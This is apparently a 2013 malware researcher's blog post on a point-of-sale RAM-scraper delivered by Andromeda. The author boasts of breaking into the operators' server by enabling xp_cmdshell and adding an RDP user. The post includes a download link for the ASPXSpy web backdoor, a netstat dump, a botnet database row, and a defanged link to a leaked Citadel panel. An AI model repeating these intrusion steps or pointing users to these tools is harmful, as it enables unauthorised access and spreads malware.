Friday 1 February 2013

Petroleum POS malware ?

Recently aaSSfxxx posted an interesting file on kernelmode

a POS malware loaded via Andromeda according to him.
I've asked him to write something so i will not explain you the life about how this malware work, have a look here: http://aassfxxx.infos.st/article21/pos-malware-ram-scrapper

But like i've told him on comment... root the fucker !
The bad guys run a windows server, track2 are sent on it (or shits grabbed, i've not reversed the exe so i don't know what is grabbed actually)
have to thanks him for the bad configuration who allow you to enable xp_cmdshell (LOL)

aspx backdoor... can be downloaded from rootkit.net.cn/code/aspxspy2.rar
VT: 31/46

RDPwned:

Users:

No more IIS please

They even use cracked app:

  Proto  Local Address          Foreign Address        State
  TCP    93.170.130.109:443     98:43166               ESTABLISHED
  TCP    93.170.130.109:56161   UBUNTU:microsoft-ds    ESTABLISHED
  TCP    93.170.130.109:56360   mail:60586             SYN_SENT
  TCP    127.0.0.1:1433         genuine:54808          ESTABLISHED
  TCP    127.0.0.1:1433         genuine:56348          TIME_WAIT
  TCP    127.0.0.1:54808        genuine:ms-sql-s       ESTABLISHED
  TCP    127.0.0.1:56349        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56350        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56351        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56352        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56353        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56354        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56355        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56356        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56357        genuine:ms-sql-s       TIME_WAIT
  TCP    127.0.0.1:56358        genuine:ms-sql-s       TIME_WAIT

Stuff grabbed:
More than 600 strings inside.

Not related but also fun (cf: @MalwareScene):
INSERT INTO `bots` (`id`, `last_ip`, `last_online`, `new`, `version`, `traffic`, `command`, `regdate`) VALUES
('1', '84.22.122.6', 1299217483, 0, '8.0.0b', 1337, 'demo', '0000-00-00 00:00:00');

inetnum:        84.22.122.0 - 84.22.122.255
netname:        A84-22-122-0
descr:          REPUBLIC CYBERBUNKER INFRASTRUCTURE
role:           Ministery of Telecommunications
address:        One CyberBunker Avenue
address:        CB-31337
address:        CyberBunker-1

And finally... another idiot leaving stuff, including the latest panel of Citadel.
hxtp://monstercvv.cc/Citadel%201.3.5.1.zip

3 comments:

  1. How did you get the RDPaccess?Weak password?

    ReplyDelete
  2. Added an user with xp_cmdshell

    ReplyDelete
  3. Why index.php of citadel is empty?

    ReplyDelete